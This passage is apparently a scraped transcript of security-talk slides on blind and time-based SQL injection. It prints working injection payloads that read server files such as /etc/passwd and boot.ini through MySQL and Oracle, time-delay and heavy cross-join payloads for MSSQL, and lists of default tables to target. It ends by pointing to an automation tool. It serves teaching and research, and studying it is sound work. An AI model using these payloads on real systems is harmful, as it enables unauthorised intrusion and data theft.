  • 31. MySQLLoadFileSELECT LOAD_FILE(‘/etc/passwd’)SQLbfTools: MySQLgetcommand (illo and dab)http://www.reversing.org/node/view/11Load Data infile; Create table C8DFC643 (datosvarchar(4000)); Load data infile 'c:\\boot.ini' into table C8DFC643; alter table C8DFC643 add column num integer auto_increment unique keyand (select count(num) from C8DFC643)and (select length(datos) from C8DFC643 where num = 1)and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1); Drop table C8DFC643
  • 32. Oracle – Plain Text filesExternal Tables; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;--Only Plain Text files
  • 33. Oracle – DBMS_LOB; execute immediate ‘DECLARE l_bfile BFILE;l_blob BLOB;BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob;l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));DBMS_LOB.fileclose(l_bfile);COMMIT;EXCEPTION WHEN OTHERS THEN ROLLBACK;END;‘; end; --
  • 36. Time-Based Blind SQL InjectionIn scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used.Injection forces a delay in the response page when the condition injected is True. - Delay functions:SQL Server: waitforOracle: dbms_lock.sleepMySQL: sleep or Benchmark FunctionPostgres: pg_sleepEx:; if (exists(select * fromusers)) waitfordelay '0:0:5’
  • 37. Exploit for Solar Empire Web Game
  • 38. Time-Based Blind SQL InjectionWhat about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…?Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
  • 40. “Where-Clause” execution orderSelect “whatever “From whateverWhere condition1 and condition2- Condition1 lasts 10 seconds- Condition2 lasts 100 secondsWhich condition should be executed first?
  • 43. Time-Based Blind SQL Injectionusing Heavy QueriesAttacker can perform an exploitation delaying the “True-answer page” using a heavy query.It depends on how the database engine evaluates the where clauses in the query.There are two types of database engines:Databases without optimization processDatabases with optimization process
  • 44. Time-Based Blind SQL Injectionusing Heavy QueriesAttacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. The Cross-join injection must be heavier than the other condition.Attacker only have to know or to guess the name of a table with select permission in the database.Example in MSSQL:Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  • 45. “Default” tablestoconstruct a heavy queryMicrosoft SQL ServersysusersOracleall_usersMySQL (versión 5)information_schema.columnsMicrosoft AccessMSysAccessObjects (97 & 2000 versions)MSysAccessStorage (2003 & 2007)45
  • 46. “Default” tablestoconstruct a heavy query…or whatever you can guessClientsCustomersNewsLoginsUsersProviders….Use your imagination…
  • 47. Ex 1: MS SQL ServerQuery takes 14 seconds -> True-Answer
  • 48. Ex 1: MS SQL ServerQuery takes 1 second -> False-Answer
  • 49. Ex 2: OracleQuery Takes 22 seconds –> True-Answer
  • 50. Ex 2: OracleQuery Takes 1 second –> False-Answer
  • 51. Ex 3: Access 2007Query Takes 39 seconds –> True-Answer
  • 52. Ex 3: Access 2007Query Takes 1 second –> False-Answer
  • 53. Marathon ToolAutomates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.Schema Extraction from known databasesExtract data using heavy queries not matter in which database engine (without schema)Developed in .NETSource code availablehttp://www.codeplex.com/marathontool